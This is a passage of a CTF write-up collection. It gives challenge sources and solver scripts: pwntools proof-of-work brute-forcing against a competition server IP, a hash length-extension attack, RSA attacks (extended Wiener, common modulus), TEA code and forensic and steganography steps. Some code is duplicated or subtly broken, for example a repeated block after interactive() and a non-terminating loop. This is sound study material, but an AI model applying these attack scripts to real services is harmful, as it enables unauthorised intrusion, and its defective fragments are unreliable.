
class ForkedServer(socketserver.ForkingMixIn, socketserver.TCPServer):
    pass

if __name__ == &quot;__main__&quot;:
    HOST, PORT = '0.0.0.0', 10012
    print(&quot;HOST:POST &quot; + HOST+&quot;:&quot; + str(PORT))
    server = ForkedServer((HOST, PORT), Task)
    server.allow_reuse_address = True
    server.serve_forever()
   
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from pwn import *
import string
import hashlib
table = string.ascii_letters + string.digits
re = remote('39.106.48.123',29929)

re.recvuntil(b'[+] sha256(XXXX+')
x = re.recv(16)
re.recvuntil(b') == ')
y = re.recv(64)

flag = 0
for a in table:
    if flag:break
    for b in table:
        if flag: break
        for c in table:
            if flag: break
            for d in table:
                z = (a + b + c + d).encode()
                if hashlib.sha256(z + x).hexdigest() == y.decode():
                    flag = 1
                    re.recv()
                    re.sendline(z)
                    break
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.interactive()

if hashlib.sha256(z + x).hexdigest() == y.decode():
                    flag = 1
                    re.recv()
                    re.sendline(z)
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.recvuntil(b'SERVER &lt;INPUT&gt;: ')
re.sendline(b'a')
re.interactive()
</code></pre>
<h2 id="trainplus"><a class="header" href="#trainplus">TrainPlus</a></h2>
<p>exp.py</p>
<pre><code class="language-python">'''
给出了一个16字节随机生成的一个字符串,已知量。并且使用自己的MD00PLUS去对sec进行一次哈希,

发现需要给出一个消息 以及sec+这个消息 能够让我们预测到这块的哈希是多少

首先我们得看一下MD00Plus这个函数,我们发现他其实跟正常的MD5不一样,而改变的地方就是一开始的padding部分 

那么其实如果了解哈希长度攻击的很快就能发现只要给出这样的就可以成功。
'''

def Md00Plus(message: bytes):
    h0 = 0x114514ab
    h1 = 0x1919810a
    h2 = 0xa0189191
    h3 = 0xba415411

    R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
    K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
         0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
         0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
         0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
         0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
         0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
         0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
         0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
         0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
         0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
         0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
         0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
         0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)

    F = lambda x, y, z: ((x &amp; y) | ((~x) &amp; z))
    G = lambda x, y, z: ((x &amp; z) | (y &amp; (~z)))
    H = lambda x, y, z: (x ^ y ^ z)
    I = lambda x, y, z: (y ^ (x | (~z)))

    L = lambda x, n: ((x &lt;&lt; n) | (x &gt;&gt; (32 - n))) &amp; 0xffffffff
    W = lambda i4, i3, i2, i1: (i1 &lt;&lt; 24) | (i2 &lt;&lt; 16) | (i3 &lt;&lt; 8) | i4
    reverse = lambda x: (x &lt;&lt; 24) &amp; 0xff000000 | (x &lt;&lt; 8) &amp; 0x00ff0000 | \
                        (x &gt;&gt; 8) &amp; 0x0000ff00 | (x &gt;&gt; 24) &amp; 0x000000ff

    ascii_list = list(map(lambda x: x, message))
    msg_length = len(ascii_list) * 8
    ascii_list.append(128)

    while (len(ascii_list) * 8 + 64) % 512 != 0:
        ascii_list.append(1)

    for i in range(8):
        ascii_list.append((msg_length &gt;&gt; (8 * i)) &amp; 0xff)

    for i in range(len(ascii_list) // 64):
        a, b, c, d = h0, h1, h2, h3
        for j in range(64):
            if 0 &lt;= j &lt;= 15:
                f = F(b, c, d) &amp; 0xffffffff
                g = j
            elif 16 &lt;= j &lt;= 31:
                f = G(b, c, d) &amp; 0xffffffff
                g = ((5 * j) + 1) % 16
            elif 32 &lt;= j &lt;= 47:
                f = H(b, c, d) &amp; 0xffffffff
                g = ((3 * j) + 5) % 16
            else:
                f = I(b, c, d) &amp; 0xffffffff
                g = (7 * j) % 16
            aa, dd, cc = d, c, b
            s = i * 64 + g * 4
            w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
            bb = (L((a + f + K[j] + w) &amp; 0xffffffff, R[j]) + b) &amp; 0xffffffff
            a, b, c, d = aa, bb, cc, dd
        h0 = (h0 + a) &amp; 0xffffffff
        h1 = (h1 + b) &amp; 0xffffffff
        h2 = (h2 + c) &amp; 0xffffffff
        h3 = (h3 + d) &amp; 0xffffffff
    h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
    digest = (h0 &lt;&lt; 96) | (h1 &lt;&lt; 64) | (h2 &lt;&lt; 32) | h3
    return hex(digest)[2:].rjust(32, '0'),ascii_list 

def md5ex(hash,message: bytes):
    reverse = lambda x: (x &lt;&lt; 24) &amp; 0xff000000 | (x &lt;&lt; 8) &amp; 0x00ff0000 | \
                        (x &gt;&gt; 8) &amp; 0x0000ff00 | (x &gt;&gt; 24) &amp; 0x000000ff
    hash = int(hash,16)
    h3 = reverse(hash&amp;0xffffffff)
    hash &gt;&gt;= 32
    h2 = reverse(hash&amp;0xffffffff)
    hash &gt;&gt;= 32
    h1 = reverse(hash&amp;0xffffffff)
    hash &gt;&gt;= 32
    h0 = reverse(hash&amp;0xffffffff)

    R = (7, 12, 17, 22) * 4 + (5, 9, 14, 20) * 4 + (4, 11, 16, 23) * 4 + (6, 10, 15, 21) * 4
    K = (0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee,
         0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8,
         0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193,
         0xa679438e, 0x49b40821, 0xf61e2562, 0xc040b340, 0x265e5a51,
         0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
         0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905,
         0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a, 0xfffa3942, 0x8771f681,
         0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60,
         0xbebfbc70, 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05,
         0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665, 0xf4292244,
         0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92,
         0xffeff47d, 0x85845dd1, 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314,
         0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391)

    F = lambda x, y, z: ((x &amp; y) | ((~x) &amp; z))
    G = lambda x, y, z: ((x &amp; z) | (y &amp; (~z)))
    H = lambda x, y, z: (x ^ y ^ z)
    I = lambda x, y, z: (y ^ (x | (~z)))

    L = lambda x, n: ((x &lt;&lt; n) | (x &gt;&gt; (32 - n))) &amp; 0xffffffff
    W = lambda i4, i3, i2, i1: (i1 &lt;&lt; 24) | (i2 &lt;&lt; 16) | (i3 &lt;&lt; 8) | i4

    ascii_list = list(map(lambda x: x, message))
    msg_length = len(ascii_list) * 8 + 512
    ascii_list.append(128)

    while (len(ascii_list) * 8 + 64) % 512 != 0:
        ascii_list.append(1)

    for i in range(8):
        ascii_list.append((msg_length &gt;&gt; (8 * i)) &amp; 0xff)

    for i in range(len(ascii_list) // 64):
        a, b, c, d = h0, h1, h2, h3
        for j in range(64):
            if 0 &lt;= j &lt;= 15:
                f = F(b, c, d) &amp; 0xffffffff
                g = j
            elif 16 &lt;= j &lt;= 31:
                f = G(b, c, d) &amp; 0xffffffff
                g = ((5 * j) + 1) % 16
            elif 32 &lt;= j &lt;= 47:
                f = H(b, c, d) &amp; 0xffffffff
                g = ((3 * j) + 5) % 16
            else:
                f = I(b, c, d) &amp; 0xffffffff
                g = (7 * j) % 16
            aa, dd, cc = d, c, b
            s = i * 64 + g * 4
            w = W(ascii_list[s], ascii_list[s + 1], ascii_list[s + 2], ascii_list[s + 3])
            bb = (L((a + f + K[j] + w) &amp; 0xffffffff, R[j]) + b) &amp; 0xffffffff
            a, b, c, d = aa, bb, cc, dd
        h0 = (h0 + a) &amp; 0xffffffff
        h1 = (h1 + b) &amp; 0xffffffff
        h2 = (h2 + c) &amp; 0xffffffff
        h3 = (h3 + d) &amp; 0xffffffff
    h0, h1, h2, h3 = reverse(h0), reverse(h1), reverse(h2), reverse(h3)
    digest = (h0 &lt;&lt; 96) | (h1 &lt;&lt; 64) | (h2 &lt;&lt; 32) | h3
    return hex(digest)[2:].rjust(32, '0'),ascii_list 

from pwn import*
import string
from pwnlib.util.iters import mbruteforce
from hashlib import*
table = string.ascii_letters+string.digits

io = remote(&quot;39.106.48.123&quot;,39628)

def pow1():
    io.recvuntil(b'XXXX+')
    suffix = io.recv(16).decode(&quot;utf8&quot;)
    io.recvuntil(b'== ')
    cipher = io.recvline().strip().decode(&quot;utf8&quot;)
    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
                        cipher, table, length=4, method='fixed')
    io.sendlineafter(b'XXXX :', proof.encode())
    return cipher
pow1()

io.recvuntil(b'Thing:')
GreatThing = io.recv(16)

from Crypto.Util.number import*
io.recvuntil(b'REATTHING:')
Md00 = io.recv(32)
H = md5ex(Md00.decode(),GreatThing)[0].encode()
for i in range(1,26):
    Pad = Md00Plus(i*b'a')[1][i:]
    MSG = bytes(Pad) + GreatThing
    s = hex(bytes_to_long(MSG))[2:].encode()+b','+ hex(bytes_to_long(H))[2:].encode()
    io.sendline(s)
    print(i,io.recv())
    msg = io.recv()
    if b'flag' in msg:
        print(msg)
        break
io.interactive()
</code></pre>
<h2 id="tea_签到题"><a class="header" href="#tea_签到题">tea_签到题</a></h2>
<pre><code class="language-js">/******************************************

Use: &quot;Hello World!&quot;.encrypt(&quot;key&quot;)
	=&gt; &quot;íSjÝqTÂWÕãAa[UÄ&quot;
******************************************/
String.prototype.encrypt = function(password) {
	const v = new Array(2);
	const k = new Array(4);
	let s = &quot;&quot;;
	var i;

	plaintext = escape(this); // use escape() so only have single-byte chars to encode

	// build key directly from 1st 16 chars of password
	for (var i = 0; i &lt; 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));

	for (i = 0; i &lt; plaintext.length; i += 8) { // encode plaintext into s in 64-bit (8 char) blocks
		v[0] = Str4ToLong(plaintext.slice(i, i + 4)); // ... note this is 'electronic codebook' mode
		v[1] = Str4ToLong(plaintext.slice(i + 4, i + 8));
		code(v, k);
		s += LongToStr4(v[0]) + LongToStr4(v[1]);
	}

	return escCtrlCh(s);
	// note: if plaintext or password are passed as string objects, rather than strings, this
	// function will throw an 'Object doesn't support this property or method' error
}

// Like C code

function code(v, k) {
    // Extended TEA: this is the 1997 revised version of Needham &amp; Wheeler's algorithm
    // params: v[2] 64-bit value block; k[4] 128-bit key
    let y = v[0];

    let z = v[1];
    const delta = 0x9E3779B9;
    const limit = delta * 32;
    let sum = 0;

    while (sum != limit) {
		y += (z &lt;&lt; 4 ^ z &gt;&gt;&gt; 5) + z ^ sum + k[sum &amp; 3];
		sum += delta;
		z += (y &lt;&lt; 4 ^ y &gt;&gt;&gt; 5) + y ^ sum + k[sum &gt;&gt;&gt; 11 &amp; 3];
		// note: unsigned right-shift '&gt;&gt;&gt;' is used in place of original '&gt;&gt;', due to lack
		// of 'unsigned' type declaration in JavaScript (thanks to Karsten Kraus for this)
	}
    v[0] = y;
    v[1] = z;
}

// supporting functions

function Str4ToLong(s) { // convert 4 chars of s to a numeric long
	let v = 0;
	for (let i = 0; i &lt; 4; i++) v |= s.charCodeAt(i) &lt;&lt; i * 8;
	return isNaN(v) ? 0 : v;
}

function LongToStr4(v) { // convert a numeric long to 4 char string
	const s = String.fromCharCode(v &amp; 0xFF, v &gt;&gt; 8 &amp; 0xFF, v &gt;&gt; 16 &amp; 0xFF, v &gt;&gt; 24 &amp; 0xFF);
	return s;
}

function escCtrlCh(str) { // escape control chars which might cause problems with encrypted texts
	return str.replace(/[\0\t\n\v\f\r\xa0'&quot;!]/g, c =&gt; `!${c.charCodeAt(0)}!`);
}

function unescCtrlCh(str) { // unescape potentially problematic nulls and control characters
	return str.replace(/!\d\d?\d?!/g, c =&gt; String.fromCharCode(c.slice(1, -1)));
}

// module.exports = (text, password) =&gt; text.encrypt(password);

/******************************************
Use: &quot;íSjÝqTÂWÕãAa[UÄ&quot;.decrypt(&quot;key&quot;)
	=&gt; &quot;Hello World!&quot;
******************************************/
String.prototype.decrypt = function(password) {
    const v = new Array(2);
    const k = new Array(4);
    let s = &quot;&quot;;
    var i;

    for (var i = 0; i &lt; 4; i++) k[i] = Str4ToLong(password.slice(i * 4, (i + 1) * 4));

    ciphertext = unescCtrlCh(this);
    for (i = 0; i &lt; ciphertext.length; i += 8) { // decode ciphertext into s in 64-bit (8 char) blocks
    v[0] = Str4ToLong(ciphertext.slice(i, i + 4));
    v[1] = Str4ToLong(ciphertext.slice(i + 4, i + 8));
    decode(v, k);
    s += LongToStr4(v[0]) + LongToStr4(v[1]);
  }

    // strip trailing null chars resulting from filling 4-char blocks:
    s = s.replace(/\0+$/, '');

    return unescape(s);
};
// Like C code

function decode(v, k) {
    let y = v[0];
    let z = v[1];
    const delta = 0x9E3779B9;
    let sum = delta * 32;

    while (sum != 0) {
    z -= (y &lt;&lt; 4 ^ y &gt;&gt;&gt; 5) + y ^ sum + k[sum &gt;&gt;&gt; 11 &amp; 3];
    sum -= delta;
    y -= (z &lt;&lt; 4 ^ z &gt;&gt;&gt; 5) + z ^ sum + k[sum &amp; 3];
  }
    v[0] = y;
    v[1] = z;
}
// supporting functions

function Str4ToLong(s) { // convert 4 chars of s to a numeric long
  let v = 0;
  for (let i = 0; i &lt; 4; i++) v |= s.charCodeAt(i) &lt;&lt; i * 8;
  return isNaN(v) ? 0 : v;
}

function LongToStr4(v) { // convert a numeric long to 4 char string
  const s = String.fromCharCode(v &amp; 0xFF, v &gt;&gt; 8 &amp; 0xFF, v &gt;&gt; 16 &amp; 0xFF, v &gt;&gt; 24 &amp; 0xFF);
  return s;
}

function escCtrlCh(str) { // escape control chars which might cause problems with encrypted texts
  return str.replace(/[\0\t\n\v\f\r\xa0'&quot;!]/g, c =&gt; `!${c.charCodeAt(0)}!`);
}

function unescCtrlCh(str) { // unescape potentially problematic nulls and control characters
  return str.replace(/!\d\d?\d?!/g, c =&gt; String.fromCharCode(c.slice(1, -1)));
}

// module.exports = (text, password) =&gt; text.decrypt(password);


let text = &quot;flag{demo}&quot;
let entext = text.encrypt(&quot;123321&quot;)
let detext = entext.decrypt(&quot;123321&quot;)
console.log(detext);
</code></pre>
<h2 id="simple"><a class="header" href="#simple">simple</a></h2>
<pre><code class="language-python">#**Task
# task.py
from Crypto.Util.number import *
import gmpy2
import random

def get_extend():
    while True:
        d = random.randint(2**680,2**730)
        if isPrime(d):
            e = gmpy2.invert(d,lcm)
            return e
#731
flag = b&quot;flag{xxxxxxxxxxx}&quot;
m = bytes_to_long(flag)
e = 65537
p = getPrime(1024)
q = getPrime(1024)
lcm = gmpy2.lcm(p-1,q-1)
n = p*q
c = pow(m,e,n)
e1 = get_extend()
e2 = get_extend()
print(&quot;e1 =&quot;,e1)
print(&quot;e2 =&quot;,e2)
print(&quot;c =&quot;,c)
print(&quot;n =&quot;,n)

#e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
#e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
#c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
#n = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607




#***Solution
# exp.sage
from sage.all import *
from Crypto.Util.number import *
from Crypto.Cipher import DES
import gmpy2
from Crypto.Util.number import *
from gmpy2 import invert
# USE extending wiener attack
e1 = 1038188773022222237625162518466985515806685046439847462572843423800303080199415368325579099819361640945202226526678764311585592296933622966635366454130900252466567292666094830865094694540899938932650663694321540899409821558619513870070621174837528024755540950294728078653453000484865860920060355130142874882872471337494879275434166435493265146752291857135290428750750609423353579700984426964475724965353873095813181244686536072523222027403912142730610262067287620007571352094447066062529895627497159337248165671672168914514241613626520037706745398642583257608070477729851466078618962204332539106519787878047712382699
e2 = 2837849440271663829778449470456059993823700375016504578318494102782617180188657051885856137280051100635878402423110369686929227684421486015532180997159960436120141492683886715611434986294622600612428406093623932339780091710632795226634412256078611259843109876301975664056868908063144172636320692414857287719870275516722663234436495523740203192523105607062687910252368627072074836944313105637959564954309098651598325997792496430340003856687190484681832529188281328826421428597879086043647647886763379182416419551074016810300511817626177321217978912504879476086100668005286481779806010131350674761039391612993646202901
c = 5973798238952580291825915383143493132916118834759984908567429997405141389115327100612059752092101975323145558282778289524466024564450720131251849100687215493221989801105144437981685382023973692198113306045957788268110316519461230170693204752380105917975206409994893101671098451678847638671373239757408532363808224681853024689663345258120864348816343897379881239786554998688501997609152329902187048422237325117741778968505252184157273467466011959504548459297647302026380076579903441434135973514451254950835559924204821846949520738057940287763572642367638668413987340659205489659594044022422368411980101640782079189025
N = 26901814699902439156457451193693740730489294959491270367027927283506475930489639407729426818974347303153364758700002407059993182986763909124690390655890031474097185414651218374672254140022392199647526025638012909369532528422355530044873378287920255523382224453173638818751280227521077881224963029942704252587893395262633450759457753054490886171089835324182422639138198164026845488515879253564971977801724349440235209377091735281830263780308625603392942624306475075157394231585266792247387837984357822842056801420064918953837917678662504712605611080802179768683537742095990507008809197788025847612652983474906829809607

a = 0.356  # 731./2049
M1 = N ** 0.5
M2 = N ** (a + 1)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
M = matrix(ZZ, [[1, -N, 0, N ** 2], [0, e1, -e1, -e1 * N], [0, 0, e2, -e2 * N], [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
t = vector(ZZ, L[0])
x = t * M ** (-1)
phi = int(x[1] / x[0] * e1)
d = invert(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))


'''
pip install pycryptodome
pip install gmpy2
sage --pip install gmpy2
sage exp.sage
'''

# b'flag{d30488dc-ed10-4f09-aebb-5c049436d250}'
</code></pre>
<h2 id="-1"><a class="header" href="#-1"></a></h2>
<pre><code class="language-python">#***Task.py

#!/usr/bin/python3
# -*- coding: utf-8 -*-
import random
from Crypto.Util.number import bytes_to_long

# from secret import FLAG
FLAG = b&quot;flag{123}&quot;
assert FLAG.startswith(b'flag{') and FLAG.endswith(b'}')

q = 210767327475911131359308665806489575328083

flag_bin = bin(bytes_to_long(FLAG[5:-1]))[2:]
l = len(flag_bin) #len(&quot;1100010011001000110011&quot;)
print(l)

print(bin(bytes_to_long(FLAG[5:-1]))) #0b1100010011001000110011

n = random.randint(l, 2*l)  #randint(22, 22*2)
print(n) #24
cipher = []
for _ in range(n): #range(0,24,1)
    r = [random.randint(2, q-2) for _ in range(l)]#range(22)  randint(2, 210767327475911131359308665806489575328081)
    # print(r)
    s = 1
    for i in range(l):#range(22)
        s = s * r[i] ** int(flag_bin[i]) % q
    cipher.append([r, s])

with open('new_output.txt', 'w') as f:
    f.write(str(cipher))
</code></pre>
<pre><code class="language-python">#exp.py
from Crypto.Util.number import *
from sage.all import *

def add(a,p):
    if pow(a,(p-1)//2,p)==1:
        return 1
    else:
        return 0

f=open('output.txt','rb')
q = 210767327475911131359308665806489575328083
out=eval(f.read())

A=Matrix(GF(2),len(out))
v=vector(GF(2),len(out))
for i in range(len(out)):
    t1,t2=out[i]
    for j in range(len(t1)):
        A[i,j]=add(t1[j],q)
        v[i]=add(t2,q)+1

m=A.solve_right(v)
m=''.join(map(str,m))
print(long_to_bytes(int(m,2)))
</code></pre>
<h2 id="nono"><a class="header" href="#nono">NONO</a></h2>
<pre><code class="language-python">import base64
import re
# 填出来的数织答案
v27 =&quot;0000000000000000000000000000000010000000000000000001110000000000000000111110000000000000111111110000000000011111111100000000001111111111100000000000111111100000000000000000000000000111111111111110000011100000000011110000111000000000111111100111111111111111000000000000000000000000000000111111100000000000001111111000000000000111111110000000000001111111000000000000000000000000000000000000000000000000&quot;

# 得到flag：flag{UDnkDgD2HEPlFEXlF8uyHPBHFEEnD8NTDPr3j85THDP+jKD=}
##
# 按照0或1的连续⻓度进⾏压缩
tmpl = re.findall(r'0+|1+', v27)
v24 = bytes([len(x) for x in tmpl])
# 拿到base64的新表
unk_403040 = [0x0C, 0xFF, 0xFF, 0xFF, 0x22, 0x2C, 0x25, 0x05, 0x1E, 0x1F, 0x34, 0x1D,
0x39, 0x30, 0x15, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2B, 0x14, 0x2D, 0x00,
0x10, 0x02, 0x11, 0x03, 0x37, 0x29, 0x33, 0x3B, 0x2E, 0x24, 0x2F, 0x20, 0x0A, 0x3D,
0x3F, 0x07, 0x08, 0x17, 0x0D, 0x28, 0x27, 0x26, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x35, 0x2A, 0x3A, 0x13, 0x18, 0x3E, 0x31, 0x38, 0x21, 0x01, 0x12, 0x0B, 0x32, 0x04,
0x06, 0x19, 0x09, 0x3C, 0x1B, 0x0E, 0x1C, 0x36, 0x0F, 0x16, 0x1A, 0x23]
mytable = [0 for _ in range(64)]
for x in unk_403040:
    if x != 0xFF:
        mytable[x] = chr(unk_403040.index(x)+43)
mytable = ''.join(mytable)
# 换表encode
b64table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s = base64.b64encode(v24)
flag = &quot;flag{&quot; + s.decode().translate(str.maketrans(b64table, mytable)) + &quot;}&quot;
print(flag)
</code></pre>
<h2 id="kaokaoni"><a class="header" href="#kaokaoni">kaokaoni</a></h2>
<pre><code class="language-python">a = [[8, 2, 22, 97, 38, 15, 0, 40, 0, 75, 4, 5, 7, 78, 52, 12, 50, 77, 91, 8],
[49, 49, 99, 40, 17, 81, 18, 57, 60, 87, 17, 40, 98, 43, 69, 48, 4, 56, 62, 0],
[81, 49, 31, 73, 55, 79, 14, 29, 93, 71, 40, 67, 53, 88, 30, 3, 49, 13, 36, 65],
[52, 70, 95, 23, 4, 60, 11, 42, 69, 24, 68, 56, 1, 32, 56, 71, 37, 2, 36, 91],
[22, 31, 16, 71, 51, 67, 63, 89, 41, 92, 36, 54, 22, 40, 40, 28, 66, 33, 13, 80],
[24, 47, 32, 60, 99, 3, 45, 2, 44, 75, 33, 53, 78, 36, 84, 20, 35, 17, 12, 50],
[32, 98, 81, 28, 64, 23, 67, 10, 26, 38, 40, 67, 59, 54, 70, 66, 18, 38, 64, 70],
[67, 26, 20, 68, 2, 62, 12, 20, 95, 63, 94, 39, 63, 8, 40, 91, 66, 49, 94, 21],
[24, 55, 58, 5, 66, 73, 99, 26, 97, 17, 78, 78, 96, 83, 14, 88, 34, 89, 63, 72],
[21, 36, 23, 9, 75, 0, 76, 44, 20, 45, 35, 14, 0, 61, 33, 97, 34, 31, 33, 95],
[78, 17, 53, 28, 22, 75, 31, 67, 15, 94, 3, 80, 4, 62, 16, 14, 9, 53, 56, 92],
[16, 39, 5, 42, 96, 35, 31, 47, 55, 58, 88, 24, 0, 17, 54, 24, 36, 29, 85, 57],
[86, 56, 0, 48, 35, 71, 89, 7, 5, 44, 44, 37, 44, 60, 21, 58, 51, 54, 17, 58],
[19, 8, 81, 68, 5, 94, 47, 69, 28, 73, 92, 13, 86, 52, 17, 77, 4, 89, 55, 40],
[4, 52, 8, 83, 97, 35, 99, 16, 7, 97, 57, 32, 16, 26, 26, 79, 33, 27, 98, 66],
[88, 36, 68, 87, 57, 62, 20, 72, 3, 46, 33, 67, 46, 55, 12, 32, 63, 93, 53, 69],
[4, 42, 16, 73, 38, 25, 39, 11, 24, 94, 72, 18, 8, 46, 29, 32, 40, 62, 76, 36],
[20, 69, 36, 41, 72, 30, 23, 88, 34, 62, 99, 69, 82, 67, 59, 85, 74, 4, 36, 16],
[20, 73, 35, 29, 78, 31, 90, 1, 74, 31, 49, 71, 48, 86, 81, 16, 23, 57, 5, 54],
[1, 70, 54, 71, 83, 51, 54, 69, 16, 92, 33, 48, 61, 43, 52, 1, 89, 19, 67, 48]]

aa = [[]for i in range(4)]
for j in range(20):
    for i in range(17):
        aa[0].append(a[j][i]*a[j][i+1]*a[j][i+2]*a[j][i+3])
        aa[1].append(a[i][j]*a[i+1][j]*a[i+2][j]*a[i+3][j])
for i in range(17):
    for j in range(17):
        aa[2].append(a[i][j]*a[i+1][j+1]*a[i+2][j+2]*a[i+3][j+3])
        aa[3].append(a[i+3][j]*a[i+2][j+1]*a[i+1][j+2]*a[i][j+3])
for i in range(len(aa)):
    print(max(aa[i]))
</code></pre>
<h2 id="ezflow"><a class="header" href="#ezflow">ezflow</a></h2>
<pre><code class="language-sh">#open in wireshark
#export zinfile from pcap
#find zip password from pcap data ,filter all sql timeout injection
#unzip file by password can get flag
</code></pre>
<p>task.py</p>
<pre><code class="language-python">from Crypto.Util.number import *
from flag import *

m = bytes_to_long(flag)

n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923

c1 = pow(m,e1,n)
c2 = pow(m,e2,n)
#c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
#c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117

</code></pre>
<p>exp.py</p>
<pre><code class="language-python">#give e1,e2,c1,c2,n
#find m
import gmpy2  
from Crypto.Util.number import long_to_bytes,bytes_to_long

n = 2748281443944427868843369402621263042158244258427433547653329234844505048333691189629107146775166551897070384880309396022510445087966911639388490862151
e1 = 65537
e2 = 992923

c1 = 285685918239736826397269350382490971822513853503791279402545608976504614743806744945079572548121135341824742716166350238418142063969240075997981863636
c2 = 129273488481770576836913112982915335157542027932363877138157510043383503149178933085861517442700435060934412452576721945085276483980455830616742529117

_, r, s = gmpy2.gcdext(e1, e2)  
m = gmpy2.powmod(c1, r, n) * gmpy2.powmod(c2, s, n) % n  
print(long_to_bytes(m))
</code></pre>
<h2 id="checkin"><a class="header" href="#checkin">checkin</a></h2>
<pre><code class="language-sh">#GY3DMYZWGE3DON3CGQZTGNZUGY2WMNJXGZTDOMRTGE3DINLGGQ4TGNJVMY2TGMZQGVTDINRXGU3GKNTFG44TKZRUHA3GMNZQGMZTKZRVHEZTANZVGVTDIYZWHE3GENRVGVTDGMJXGQ3WI
open cryberChef aoto decode
</code></pre>
<h2 id="capture-radiate-chart"><a class="header" href="#capture-radiate-chart">Capture Radiate Chart</a></h2>
<p>get_rar.py</p>
<pre><code class="language-python">data = open('alien.png','rb').read()
flag = ''
pos = data.index(b'IDAT')
data = data[pos+5:]
while 1:
    try:
        pos = data.index(b'IDAT')
        flag += str(hex(data[pos-5])[2:].zfill(2))
        data = data[pos+5:]
    except:
        f1 = open('out.rar','w')
        f1.write(flag)
</code></pre>
<h2 id="iloveyou"><a class="header" href="#iloveyou">ILOVEYOU</a></h2>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230604014025638.png" alt="image-20230604014025638" /></p>
<pre><code class="language-sh"># open http://www.cmd5.com/ decode find flag
</code></pre>
<h2 id="bobs-enc"><a class="header" href="#bobs-enc">bob’s enc</a></h2>
<p>task.py</p>
<pre><code class="language-python">from secret import * 
